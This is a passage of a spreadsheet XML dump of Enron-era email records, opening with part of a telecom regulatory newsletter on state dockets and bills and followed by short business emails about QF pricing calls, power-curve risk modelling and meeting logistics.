costs were too high--more than twice the level reported by_x000D_
Verizon--because the company doesn't perform its own OSS modifications._x000D_
Qwest relies on Telcordia Technologies, Inc._x000D_
_x000D_
The commission allowed Verizon to collect a maximum of $1.9 million and_x000D_
allowed Qwest to collect a maximum of $5.5 million for OSS transition_x000D_
costs.  Multiplying Verizon's proposed collection derived the value_x000D_
assigned to Qwest's OSS recovery by the approximate ratio of Qwest's_x000D_
access to Verizon's access lines within the state._x000D_
_x000D_
The commission also took up a variety of collocation issues.  Verizon_x000D_
doesn't have to continue offering its Verizon-owned splitter option_x000D_
beyond Dec. 15, 2000, on lines not currently using the company's_x000D_
splitters.  The commission found Qwest's assumption that the average_x000D_
cable length is 100 feet to be reasonable.  It approved Verizon's_x000D_
estimates for planning and engineering time.  Other collocation issues_x000D_
addressed in the order include Verizon's costs for cage enclosure and_x000D_
building modification, efficient splitter configuration, Verizon's_x000D_
jumper costs, and Verizon's environmental conditioning._x000D_
_x000D_
Hearings for Part B of this proceeding are scheduled to begin March 26._x000D_
The order is available at_x000D_
http://www.wutc.wa.gov/webdocs.nsf/6f30f546379903ad8825652a005e07f2/d0c1a5d5db_x000D_
085e78882569e50082ac29!OpenDocument._x000D_
(Docket no. UT-003013, In the Matter of the Continued Costing and_x000D_
Pricing of Unbundled Network Elements, Transport, and Termination)_x000D_
_x000D_
CUSTOMER-AFFECTING_x000D_
CONNECTICUT_x000D_
DPUC tells WorldCom to change collect call notification policy_x000D_
_x000D_
The Department of Public Utility Control has ordered WorldCom, Inc., to_x000D_
provide advance notice before imposing a collect call blocks on_x000D_
customers' telephone numbers.  The DPUC's decision adopts a draft order_x000D_
released last month.  (1/17/01 p.m.)_x000D_
_x000D_
In March 1999 the DPUC launched an investigation into WorldCom's_x000D_
blocking procedures in response to complaints that the company had_x000D_
prevented the completion of collect calls from prison facilities._x000D_
Families of inmates said WorldCom didn't notify them that collect calls_x000D_
would be blocked, even though they always paid their collect call_x000D_
charges.  Under the company's current tariffs, WorldCom can block_x000D_
collect calls from correctional facilities without notice._x000D_
_x000D_
WorldCom places collect call blocks to prevent "high-toll fraud_x000D_
situations."  The company identifies end users with unusually high_x000D_
numbers of collect calls.  It then assesses the end user's payment_x000D_
history and whether the end user has verified that the calls are_x000D_
legitimate.  If WorldCom is unable to verify the legitimacy of the_x000D_
calls, it places a block on the end user's line._x000D_
_x000D_
The department determined that WorldCom's procedures are reasonable for_x000D_
most customers but concluded that the company needs to make more of an_x000D_
effort to notify a "small segment of the end user population" that is_x000D_
being maligned by the company's procedures._x000D_
_x000D_
The department, however, removed language from last month's draft that_x000D_
said the imposition of a collect call block constituted "a form of_x000D_
termination of service."  The department instead simply ordered WorldCom_x000D_
to revise its notification procedure to "ensure that every end user_x000D_
subject to the imposition of collect call blocks on intrastate services_x000D_
shall be provided advance notification."_x000D_
_x000D_
If WorldCom can't reach a customer by phone and can't provide written_x000D_
notice by overnight mail, it must use a "live agent" to find the_x000D_
person.  WorldCom can initiate a collect call block without actual_x000D_
notice only after trying the options for three days._x000D_
_x000D_
The department gave WorldCom until Feb. 25 to change its procedures and_x000D_
directed the company to submit a written copy of the new procedures by_x000D_
Feb. 28.  WorldCom also must file status reports each month through_x000D_
June.  (Docket No. 99-03-37, DPUC Review of MCI WorldCom, Inc.'s Collect_x000D_
Calling Notification and Termination Policies)_x000D_
_x000D_
STATE &amp; LOCAL GOVERNMENT_x000D_
MICHIGAN_x000D_
Gov. Engler makes high technology a priority_x000D_
_x000D_
One of the initiatives Gov. John Engler (R.) outlined in his State of_x000D_
the State address is ensuring "unfettered access to the information_x000D_
economy."  During his speech yesterday, Engler said local governments_x000D_
shouldn't be allowed "to erect stoplights and expensive tollbooths on_x000D_
the information highway."_x000D_
_x000D_
The governor said he has asked the Public Service Commission, the_x000D_
Michigan Economic Development Corp., and the e-Michigan office to_x000D_
recommend immediate reforms.  The Economic Development Corp. assists_x000D_
businesses seeking to expand or relocate within the state, and_x000D_
e-Michigan oversees the government's initiative to provide information_x000D_
electronically._x000D_
_x000D_
Engler said, "We need to eliminate excessive access fees.  We need to_x000D_
curb lengthy negotiation.  We need to curtail costly delays.  The public_x000D_
interest demands that we break the grip of these broadband bandits."_x000D_
_x000D_
INTERNET_x000D_
NORTH DAKOTA_x000D_
House passes bill to adopt UETA_x000D_
_x000D_
The House has passed by a 95-3 vote a bill that would create a Uniform_x000D_
Electronic Transactions Act to provide a legal structure for transacting_x000D_
business over electronic media.  (1/2/01 p.m.)  HB 1106 has been_x000D_
referred to the Senate Judiciary Committee._x000D_
_x000D_
MISSISSIPPI_x000D_
UETA bill set to reach Senate floor_x000D_
_x000D_
The Senate Committee on Appropriations has passed SB 2678 to enact the_x000D_
Uniform Electronic Transactions Act (UETA), clearing the way for the_x000D_
bill to proceed to the full Senate.  Earlier this week the Senate_x000D_
Committee on Fees, Salaries, and Administration also approved the_x000D_
measure.  (1/30/01 p.m.)_x000D_
_x000D_
The bill, introduced by Sen. Neely C. Carlton (D., District 22), aims to_x000D_
facilitate e-commerce by giving electronic records and signatures the_x000D_
same legal effect as their pen and paper counterparts._x000D_
_x000D_
WIRELESS_x000D_
NEBRASKA_x000D_
Judiciary Committee to consider cellphone bill_x000D_
_x000D_
The Judiciary Committee has scheduled a hearing for tomorrow to consider_x000D_
a measure intended to reduce the number of traffic caused by drivers_x000D_
using wireless phones.  LB 42 would create a "rebuttable presumption of_x000D_
negligence" if a driver were in a traffic accident while using a_x000D_
wireless phone.  Sen. David Landis (I., District 46) introduced the_x000D_
measure._x000D_
_x000D_
The committee is scheduled to meet at 1 p.m. in Room 1113 of the State_x000D_
Capitol.  Because the committee is scheduled to hear six other bills_x000D_
tomorrow, it's difficult to predict what time LB 42 will be addressed, a_x000D_
legislative staff member told TR.  It's "possible but not probable" that_x000D_
the committee will vote on the measure tomorrow, the staff member said._x000D_
_x000D_
CUSTOMER-AFFECTING_x000D_
MICHIGAN_x000D_
Legislation would prohibit telemarketers from blocking Caller ID_x000D_
_x000D_
Rep. Chris Kolb (D., District 53) has introduced HB 4126 to prohibit_x000D_
telemarketers from blocking residential telephone subscribers' Caller_x000D_
ID.  HB 4126 would prohibit local exchange and interexchange carriers_x000D_
from providing any network element or service to a telemarketer that_x000D_
would block or otherwise interfere with a residential subscriber's_x000D_
Caller ID._x000D_
_x000D_
The measure has been referred to the Committee on Energy and Technology._x000D_
_x000D_
INTERNET_x000D_
HAWAII_x000D_
Bill would prohibit 'cybersquatting'_x000D_
_x000D_
Rep. Avery B. Chumbley (D., District 6) has introduced SB 1276 to_x000D_
prohibit "cybersquatters" from registering Internet domain names that_x000D_
are widely recognized trademarks.  The measure would prohibit profiting_x000D_
by selling the domain name to the trademark owner.  SB 1276 would add a_x000D_
new cybersquatting section to chapter 482, Hawaii Revised Statutes,_x000D_
which pertains to trademark protection._x000D_
_x000D_
SB 1276 would make it illegal to register in bad faith a domain name_x000D_
that is the same as or "confusingly similar" to a mark that is already_x000D_
famous at the time of registration.  The bill would allow courts to_x000D_
consider several factors in determining bad faith, including the degree_x000D_
to which the domain name reflected the name of the person who registered_x000D_
it.  Courts also could consider whether the person who registered the_x000D_
domain had used the name previously in offering legitimate goods and_x000D_
services._x000D_
_x000D_
Individuals could bring a civil action against alleged violators of SB_x000D_
1276 seeking several types of relief, including compensatory damages,_x000D_
punitive damages, and injunctive relief, which would force the offender_x000D_
to relinquish the domain.  Instead of seeking actual damages and_x000D_
profits, the individual filing the suit could choose to receive_x000D_
statutory damages of between $2,500 and $100,000 per domain name._x000D_
_x000D_
SB 1276 has been referred to the Economic Development and Technology_x000D_
Committee, the Commerce, Consumer Protection, and Housing Committee, and_x000D_
the Judiciary Committee.  Its text is available at_x000D_
http://www.capitol.hawaii.gov/sessioncurrent/bills/sb1276_.htm._x000D_
_x000D_
FUTURE OF REGULATION_x000D_
TENNESSEE_x000D_
Filing fees for telephone cooperatives would rise under bill_x000D_
_x000D_
Rep. Frank Buck (D., District 40) has introduced HB 355 to increase the_x000D_
fees telephone cooperatives pay to file certain documents with the_x000D_
secretary of state.  HB 355 would boost the amount telephone_x000D_
cooperatives pay to file articles of incorporation from $25 to $30.  The_x000D_
fee for filing articles of dissolution would jump from $15 to $20, and_x000D_
the filing fee for a certificate of change of principal office would_x000D_
increase from $5 to $10._x000D_
_x000D_
The bill's text is available at_x000D_
http://www.legislature.state.tn.us/bills/currentga/Bill/HB0355.pdf._x000D_
_x000D_
WIRELESS_x000D_
NEW YORK_x000D_
Bill would require written notice before terminating service contracts_x000D_
_x000D_
Sen. Charles J. Fuschillo (R., District 8) has introduced SB 880 to_x000D_
require mobile telephone carriers to provide written notice of the_x000D_
termination date of long-term customer contracts.  The notice would have_x000D_
to be provided at least 45 days before the contract's termination date._x000D_
_x000D_
The measure is intended to help customers whose mobile service contracts_x000D_
have a provision allowing the provider to continue service after a_x000D_
contract expires for another term at a new rate if the customer fails to_x000D_
request termination.  Fuschillo hopes written notification will enable_x000D_
consumers to "shop for a plan that better fits their needs, or to shop_x000D_
for more up-to-date equipment or type of service."_x000D_
_x000D_
The bill has been referred to Consumer Protection Committee._x000D_
_x000D_
NETWORK MANAGEMENT_x000D_
UTAH_x000D_
PSC to hold technical conference on number conservation_x000D_
_x000D_
The Public Service Commission has scheduled a Feb. 22 technical_x000D_
conference to review the resources available to meet its numbering needs_x000D_
for the relief plan it ordered for the "801" number planning area_x000D_
(NPA).  In August the commission ordered a number pooling trial to take_x000D_
place in the 801 NPA.  (8/11/00 p.m.)_x000D_
_x000D_
The issues discussed at the technical conference will include_x000D_
conservation measures being used, measures that may need modification,_x000D_
and measures that may need to be implemented to ensure efficient use of_x000D_
the existing numbering resources.  (Docket no. 99-999-04)_x000D_
_x000D_
CUSTOMER-AFFECTING_x000D_
WASHINGTON_x000D_
WUTC sets workshop on customer notice rules_x000D_
_x000D_
The Utilities and Transportation Commission has scheduled a Feb. 28_x000D_
workshop to discuss its customer notice rules.  The commission has_x000D_
proposed moving the rules from the tariff rule to the industry-specific_x000D_
rules.  During the workshop, participants will have the opportunity to_x000D_
comment on the placement of the rules and their content._x000D_
_x000D_
Comments are due Feb. 20.  (Docket no. U-991301, Utility_x000D_
General-Tariffs, Chapter 480-80 WAC)_x000D_
_x000D_
NETWORK MANAGEMENT_x000D_
FLORIDA_x000D_
New '386' area code to take effect soon_x000D_
_x000D_
Florida's new "386" area code will take effect Feb. 15 in several_x000D_
counties that were split from the "904" area code last fall, the Public_x000D_
Service Commission has announced.  The PSC voted to split the 904_x000D_
numbering plan area in September 2000, and North American Numbering Plan_x000D_
administrator NeuStar, Inc., assigned the 386 area code in November_x000D_
2000.  (11/28/00 p.m.)_x000D_
_x000D_
When the 386 area code takes effect, permissive dialing will begin for_x000D_
Columbia, Flagler, Hamilton, Lafayette, Suwannee, and Union counties and_x000D_
parts of Volusia, Putnam, Alachua, and Gilchrist counties.  Mandatory_x000D_
dialing is scheduled to begin Nov. 5._x000D_
_x000D_
ADVANCED SERVICES_x000D_
NEW YORK_x000D_
Time Warner Cable brings VoIP test to Rochester_x000D_
_x000D_
Time Warner Cable has expanded its trial of local Internet telephone_x000D_
service to the Rochester, N.Y., area from the initial test site in_x000D_
Portland, Maine.  The service, which is being marketed to Time Warner_x000D_
Cable's Internet service provider (ISP) customers as an additional_x000D_
offering, uses voice over Internet protocol (VoIP) technology.  The_x000D_
Rochester test will include up to 1000 of the company's ISP customers in_x000D_
part of Monroe County, N.Y._x000D_
_x000D_
Time Warner Cable said its Portland test has shown "excellent customer_x000D_
acceptance," adding that market research in New York indicates that_x000D_
between 40% and 50% of its ISP customers would subscribe to the VoIP_x000D_
service._x000D_
_x000D_
_x000D_
Federal law prohibits duplication in any form, including electronic,_x000D_
without permission of the publisher._x000D_
_x000D_
TR's State NewsWire Copyright 1998, 1999, 2000 Telecommunications_x000D_
Reports International, Inc. (ISSN 1082-9350) is transmitted each_x000D_
business day at 8 a.m. and 2 p.m., except holidays._x000D_
Telecommunications Reports International, Inc._x000D_
1333 H St. NW, Suite 100-E_x000D_
Washington, DC 20005-4707_x000D_
_x000D_
Associate Editor for Online Publications: Jennifer Erschen, E-mail:_x000D_
jerschen@tr.com_x000D_
Senior Legislative &amp; Regulatory Analyst: Gayle Kansagor, E-mail:_x000D_
gkansagor@tr.com_x000D_
Senior Research Analyst: Steve Arlowe, E-mail: sarlowe@tr.com_x000D_
Senior Analyst: Barney McManigal, E-mail: bmcmanigal@tr.com_x000D_
Senior Research Analyst: Brandi Kerns, E-mail: bkerns@tr.com_x000D_
Account Services: Eileen Callahan (202) 312-6116, (202) 842-3023 (fax)_x000D_
E-mail: ecallahan@tr.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Jul 2001 17:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pay NY-ISO Fee</t>
  </si>
  <si>
    <t xml:space="preserve">	TASK ASSIGNMENT_x000D_
_x000D_
_x000D_
Status:		completed_x000D_
_x000D_
Task Priority:		1_x000D_
Task Due On:		1/12/2001_x000D_
Task Start Date:	_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 05:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Risk Memo re Encorp Series D investment</t>
  </si>
  <si>
    <t>No need to do a risk memo if the legal risk rating would be a 1.  Is that _x000D_
what this one would be?  Mark_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 02/21/2001 01:49 PM -----_x000D_
_x000D_
	Eddy Daniels@ENRON_x000D_
	02/15/2001 04:17 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT, Charles Vetters/HOU/ECT@ECT, Kyle _x000D_
Kettler/HOU/ECT@ECT, John J Lavorato/Enron@EnronXGate, Michael L _x000D_
Miller/NA/Enron@Enron_x000D_
		 cc: Lance Schuler-Legal/HOU/ECT@ECT_x000D_
		 Subject: Risk Memo re Encorp Series D investment_x000D_
_x000D_
Please find attached a legal risk memorandum re the Encorp investment for _x000D_
your review._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Eddy Daniels</t>
  </si>
  <si>
    <t>Sat, 20 Jan 2001 19:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steven@iepa.com'})</t>
  </si>
  <si>
    <t>frozenset({'bfpjv@c-zone.net', 'roger.pelote@williams.com', 'kfickett@usgen.com', 'rescalante@riobravo-gm.com', 'ain@worldnet.att.net', 'jackp@calpine.com', 'lucian_fox@ogden-energy.com', 'siliff@riobravo-gm.com', 'tcortopassi@ogden-energy.com', 'fmisseldine@caithnessenergy.com', 'kbssac@aol.com', 'edstrome@epenergy.com', 'susan_j_mara@enron.com', 'lale@dynegy.com', 'tom.hartman@fpl.com', 'billw@calpine.com', 'steve_ponder@fpl.com', 'nam.nguyen@powersrc.com', 'wkawamoto@wm.com', 'dnelsen@gwfpower.com', 'rjhickok@duke-energy.com', 'cody.carter@williams.com', 'emaddox@seawestwindpower.com', 'wfhall2@duke-energy.com', 'freesrj@apci.com', 'eric.eisenman@neg.pge.com', 'fernley.doug@epenergy.com', 'dean_gosselin@fpl.com', 'ccastillo@riobravo-gm.com', 'gtbl@dynegy.com', 'rich_dyer@ogden-energy.com', 'khoffman@caithnessenergy.com', 'frank.derosa@gen.pge.com', 'snoll@thermoecotek.com', 'paul_wood@ogden-energy.com', 'hap.boyd@enron.com', 'hellertj@apci.com', 'sangorgon@aol.com', 'pete@calwind.com', 'rllamkin@seiworldwide.com', 'twetzel@thermoecotek.com', 'wscobee@caithnessenergy.com', 'marty_mcfadden@ogden-energy.com', 'sdl@calwind.com', 'bellery@spi-ind.com', 'ed.tomeo@uaecorp.com', 'wcarlson@wm.com', 'jdasovic@enron.com', 'joe.greco@uaecorp.com', 'cabaker@duke-energy.com', 'paula_soos@ogden-energy.com', 'eileenk@calpine.com', 'curt.hatton@gen.pge.com', 'alex.sugaoka@uaecorp.com', 'dparque@ect.enron.com', 'elliottsa@earthlink.net', 'joer@calpine.com', 'jweisgall@aol.com', 'curtis_l_kebler@reliantenergy.com', 'sfrier@kjcsolar.com'})</t>
  </si>
  <si>
    <t>IMPORTANT CONFERENCE CALL ON QF/SRAC MATTERS SCHEDULED FOR 12:30_x000D_
 P.M. (NOONISH) ON SUNDAY, JAN.  21</t>
  </si>
  <si>
    <t>An important conference call is scheduled  for 12:30 p.m. (PST) on Sunday, _x000D_
Today, Jan 21 to discuss the status of  legislative meetings on QF/SRAC _x000D_
matters.? _x000D_
?_x000D_
Call-In number is???  ??? ??? 888-422-7124_x000D_
Particpant Code  is??????????111756_x000D_
?_x000D_
?_x000D_
Status Report_x000D_
After a marathon 12 hour meeting with Assemplyman  Keeley, Senator Battin, QF _x000D_
Parties, and SCE, a Keeley sponsored "deal" was  proposed at 3:30 a.m. this _x000D_
morning.? The crux of the deal is as  follows:_x000D_
?_x000D_
For renewables and non-gas fired QF,  essentially ..._x000D_
?_x000D_
_x000D_
7.8 cents/kwh for delivered power for 5 years  ["all in", i.e. includes _x000D_
capacity and energy]_x000D_
1.0 on losses_x000D_
no 'clawback' for wind resources which may have  failed to meet fixed _x000D_
capacity obligations in the past_x000D_
Applies "going forward" (presumedly Feb.  1)_x000D_
_x000D_
?_x000D_
?_x000D_
For gas-fired  QFs..._x000D_
?_x000D_
_x000D_
7.8 cents/kwh for five years, assuming gas is  $5.60;? payment will _x000D_
increase/decrease tied to gas? (this assumes an  IER of 9821)_x000D_
1.0 on line losses_x000D_
applies "going forward"_x000D_
_x000D_
Caacity True-up and "forbearance" were not  addressed.? Credit worthiness _x000D_
will be address in the technical conference  scheduled for later today _x000D_
(Sunday).? This  program will require in part legislative blessing and _x000D_
direction, followed by  CPUC approval of individual contract amendments.? _x000D_
This is essentially the  PG&amp;E/QF "deal" for the gas guys.? For the _x000D_
renewables, it is more of a  fixed payment approach._x000D_
?_x000D_
A "Technical Conference" is scheduled for Sunday  (today) in Sacramento to _x000D_
work out some of the implementing  details.</t>
  </si>
  <si>
    <t>Fri, 10 Mar 2000 00:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'vernon.mercaldo@enron.com'})</t>
  </si>
  <si>
    <t>HEy</t>
  </si>
  <si>
    <t>call me when you get out of your morning meeting</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 03:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'winston.jia@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tanya.tamarchenko@enron.com', 'jaesoo.lew@enron.com'})</t>
  </si>
  <si>
    <t>RE: clustering for power</t>
  </si>
  <si>
    <t>Tanya,_x000D_
_x000D_
As we discussed in the last meeting, to simulate secondary power curve we _x000D_
need correlated jump sizes. This is totally different from the current _x000D_
secondary price curve simulation which assume the perfect correlation and _x000D_
also totally different from the secondary GAS basis curve simulation which is _x000D_
based on the hedging ratio._x000D_
_x000D_
There are two more issues on my side I need to resolve:_x000D_
1. I want resolve the power basis curve issue.  Currently all power position _x000D_
on these basis curve are actually price positions.  We are hard coding this: _x000D_
if power basis we add basis to corresponding region curve.  I am trying to _x000D_
remove this hard coding by asking loading the price curve for all these basis _x000D_
locations._x000D_
_x000D_
2. Same is true for all those Power F curves.  These curves looks similar to _x000D_
those basis curves.  Currently we just directly map these F curves to the _x000D_
corresponding region curves.  I would also prefer to load the price curves _x000D_
instead of the price differences._x000D_
_x000D_
From research, I need those jump size correlations._x000D_
_x000D_
Clearly, all these involve many new development, unless we want to use _x000D_
simpler way to simulate secondary power curves._x000D_
_x000D_
Regards,_x000D_
_x000D_
Winston_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Tamarchenko, Tanya  _x000D_
Sent: Monday, April 16, 2001 9:17 AM_x000D_
To: Lew, Jaesoo_x000D_
Cc: Gorny, Vladimir; Jia, Winston; Kaminski, Vince_x000D_
Subject: Re: clustering for power_x000D_
_x000D_
Jaesoo,_x000D_
as we discussed last week on Wednesday meeting can you, please,_x000D_
implement clustering for power curves by geographical region. This involves _x000D_
the following:_x000D_
_x000D_
1. Deciding together with Risk Control how many geographical regions we want _x000D_
to use_x000D_
and which Enron's curves belong to each region._x000D_
2. Deciding together with Risk Control how to choose core curves for each _x000D_
region. This decision can _x000D_
be maid based on the a) position size; b) statistical analysis. There might _x000D_
be other considerations._x000D_
3. Doing regression analysis for each curve versus the corresponding core _x000D_
curve._x000D_
_x000D_
Winston,_x000D_
can is it possible to run VAR for the clustering results obtained by Jaesoo _x000D_
with clustering done by SAS?_x000D_
Should we wait for the stage re-fresh and what is the status on this? _x000D_
_x000D_
Tanya.</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 08:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeffn@subutil.com'})</t>
  </si>
  <si>
    <t>frozenset({'bpadiscovery@merkellaw.com', 'efinklea@energyadvocates.com', 'dfaulk@puget.com', 'michaelearly@earthlink.net', 'mmetzler@ci.tacoma.wa.us', 'energlaw@aol.com', 'simonf@atg.wa.gov', 'lawyer@teleport.com', 'lwolv@worldaccessnet.com', 'pete@ashland.or.us', 'sjohnsto@wutc.wa.gov', 'dws@keywaycorp.com', 'jdeason@chbh.com', 'pvickery@tpud.org', 'terrym@millcreeklaw.com', 'pljacklin@stoel.com', 'eric.larson@oremetwahchang.com', 'mershanlaw@aol.com', 'ghuhta@cowlitzpud.org', 'tracigrundon@dwt.com', 'rkindley@schwabe.com', 'alan@epud.org', 'ias@dvclaw.com', 'john.yanov@eweb.eugene.or.us', 'crow@millernash.com', 'huse@eesconsulting.com', 'doney@doneylaw.com', 'mhain@ect.enron.com', 'johncameron@dwt.com', 'jhartso@enron.com', 'jack.speer@alcoa.com', 'jacksonc@ida.net', 'jpw@duncanallen.com', 'pfox@bracepatt.com', 'darcy@tonkon.com', 'townsend@chbh.com', 'sawestenberg@bpa.gov', 'rachel@rnp.org', 'lyn_williams@pgn.com', 'kmoxness@cencoast.com', 'lhamilton@avistaenergy.com', 'rfoiani@gcpud.org', 'rdb@keywaycorp.com', 'ratecase@pngc.com', 'cub@teleport.com', 'pmurphy@mbllp.com', 'dmacgregor@morganlewis.com', 'johk@critfc.org', 'scott.brattebo@pacificorp.com', 'seligman@teleport.com', 'eboyd@ppcpdx.org', 'kyle@ppcpdx.org', 'steve@nwenergy.org', 'bassl@sce.com', 'rle@givenspursley.com', 'jlh@mc-power.com', 'rbstrong@painehamblen.com', 'bferranti@mbllp.com', 'wmgt3@montana.com', 'eauverde@hotmail.com', 'dbkinnard@pplmt.com', 'aw_turner@pgn.com', 'peter@richardsonandoleary.com', 'kevin.clark@ci.seattle.wa.us', 'skaravit@ci.tacoma.wa.us', 'marss@perkinscoie.com', 'dldorrell@stoel.com', 'rpierce@avistaenergy.com', 'erick_johnson@pngc.com', 'stephens@eslerstephens.com', 'lpeters@pacifier.com', 'tgrim@chbh.com', 'kpom@mail.pacifier.com', 'ali.rodol@ci.seattle.wa.us', 'janet.prewitt@state.or.us', 'pspi@dynegy.com', 'abuckley@wutc.wa.gov', 'jolynnr@mresearch.com', 'cwagers@dcpud.org', 'pete.forsyth@kaiseral.com', 'tdeboer@painehamblen.com', 'jrb_ora@televar.com', 'dparrish@prmllp.com', 'darkills@popud.com', 'archive-power-ratecase@bpa.gov', 'dan.meek@usa.net', 'kknitte@gcpud.org', 'elisackf@aol.com', 'pnichols@idahopower.com', 'doug_brawley@pngc.com', 'mthomas@mtpower.com', 'pobenchain@idahopower.com', 'matts1@atg.wa.gov', 'weavertr@yakima-wa.com', 'marc.hellman@state.or.us', 'jsaven@pacifier.com', 'paul@kinergyllc.com', 'mike.macdougall@powerex.com', 'rates@ppcpdx.org', 'tstevenson@ci.burbank.ca.us', 'ccopatrny@e-z.net', 'jschlect@avistacorp.com', 'bessex@cowlitzpud.org', 'discoveryparalegal@bpa.gov', 'mschaff@worldnet.att.net'})</t>
  </si>
  <si>
    <t>RE: WP-02 Data Responses SL-SP:001 through SL-SP:006</t>
  </si>
  <si>
    <t xml:space="preserve"> Attached are SUB's Data Responses to Bonneville Power_x000D_
Administration's Data Request.  These files are sent electronically via_x000D_
e-mail due to potential problems with the Discovery site._x000D_
_x000D_
&gt;  &lt;&lt;Data Response BPA_SP_009.doc&gt;&gt;  &lt;&lt;Data_Response_BPA_SP_009.xls&gt;&gt;_x000D_
&gt; &lt;&lt;IOU04.xls&gt;&gt;_x000D_
&gt;_x000D_
Jeff Nelson_x000D_
Resource Projects Manager_x000D_
Springfield Utility Board_x000D_
Phone: (541) 744 - 3779_x000D_
Fax: (541) 744 - 2263_x000D_
e-mail: jeffn@subutil.com_x000D_
_x000D_
_x000D_
 - Data Response BPA_SP_009.doc_x000D_
 - Data_Response_BPA_SP_009.xls_x000D_
 - IOU04.xls</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 04:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'goozmeister@yahoo.com'})</t>
  </si>
  <si>
    <t>This coming week.....</t>
  </si>
  <si>
    <t>Hey Mark!_x000D_
Here is (FINALLY) the long awaited...true you probably_x000D_
weren't dying for it.. but here we are anyway- I'm_x000D_
emailing you! So hows life in Oregon? things are doing_x000D_
okay here. had kind of crazy/crappy weekend, but it_x000D_
happens. Anyway-I'm hoping will be able to get_x000D_
together this week while you are in town. Of course I_x000D_
have work wed- sun- the whole time your here, but I_x000D_
was going to try to see if I could get either wed,_x000D_
thurs, or sunday off if it works for you and we can_x000D_
hang. Unfortunately I wasn't able to email you until_x000D_
now and the week came too quick so it is hard to plan_x000D_
much, but if your busy I totally understand and I just_x000D_
hope will be able to hook up for a bit. If one day is_x000D_
better than the other email me or give me a call. I'll_x000D_
just search on my end to see if I can get any of them_x000D_
covered. I hope everythings going okay on your end. I_x000D_
miss you and can't waitto see you. Talk soon. And lets_x000D_
try to get these emails going._x000D_
Lots of love,_x000D_
Lisa_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Auctions - Buy the things you want at great prices._x000D_
http://auctions.yahoo.com/</t>
  </si>
  <si>
    <t>Wed, 29 Mar 2000 03:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Precipitous Drop in Calpine's Stock Price</t>
  </si>
  <si>
    <t>Thanks for the info.  Mark</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 06:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'priya.jaisinghani@enron.com'})</t>
  </si>
  <si>
    <t>A/A Halloween Happy Hour</t>
  </si>
  <si>
    <t>I will be attending the happy hour on Thursday._x000D_
_x000D_
Mathew Smith_x000D_
Associate, West Gas Trading</t>
  </si>
  <si>
    <t>Meeting Confirmation - May 23rd</t>
  </si>
  <si>
    <t>pls put on my calendar.  thanks.df_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 05/11/2000 _x000D_
09:04 AM ---------------------------_x000D_
MEETING CONFIRMATION_x000D_
_x000D_
_x000D_
_x000D_
From: Rosemary Gracey on 05/09/2000 03:26 PM_x000D_
To: Dave Neubauer/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Kent _x000D_
Miller/ET&amp;S/Enron@ENRON, John Dushinske/ET&amp;S/Enron@ENRON, Tim _x000D_
Johanson/ET&amp;S/Enron@ENRON, Steven January/ET&amp;S/Enron@ENRON_x000D_
cc: Deb Cappiello/ET&amp;S/Enron@ENRON, Sharon Brown/ET&amp;S/Enron@ENRON _x000D_
Subject: Meeting Confirmation - May 23rd_x000D_
_x000D_
TOPIC(S): Flex Services_x000D_
 DATE: Tuesday, May 23_x000D_
LOCATION: Rm 646 (Library)/we will call Steve in his office X5659_x000D_
TIME: 1:00-4:00 pm_x000D_
_x000D_
For questions, please call John X7440.</t>
  </si>
  <si>
    <t>Re: Voting</t>
  </si>
  <si>
    <t xml:space="preserve">I agree, however, I will exercise my right to vote in the morning to _x000D_
hopefully ignore the long line of traffic trying to get into downtown.  </t>
  </si>
  <si>
    <t>Wed, 8 Aug 2001 14:14:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'juana.fayett@enron.com', 'w..white@enron.com', 'trang.le@enron.com', 'patricia.rivera@enron.com'})</t>
  </si>
  <si>
    <t>FW: Deval. impact</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 -----Original Message-----_x000D_
From: 	Poole, Julian  _x000D_
Sent:	Tuesday, August 07, 2001 10:51 AM_x000D_
To:	Gorny, Vladimir; Figueroa, Xochitl; Stevens, Martha_x000D_
Subject:	Deval. impact_x000D_
_x000D_
Might interest you._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 14:14:16 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Direct Mail Pack Letter</t>
  </si>
  <si>
    <t xml:space="preserve">I've redrafted it.  See attached.  Thanks._x000D_
_x000D_
Kal_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Wednesday, February 06, 2002 3:59 PM_x000D_
To:	Shah, Kal_x000D_
Subject:	RE: Direct Mail Pack Letter_x000D_
_x000D_
Can you redraft in light of how I redrafted the other one - removing Enron's name from the first paragraph.  And resend to me_x000D_
_x000D_
Thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shah, Kal  _x000D_
Sent:	Wednesday, February 06, 2002 3:31 PM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	Direct Mail Pack Letter_x000D_
_x000D_
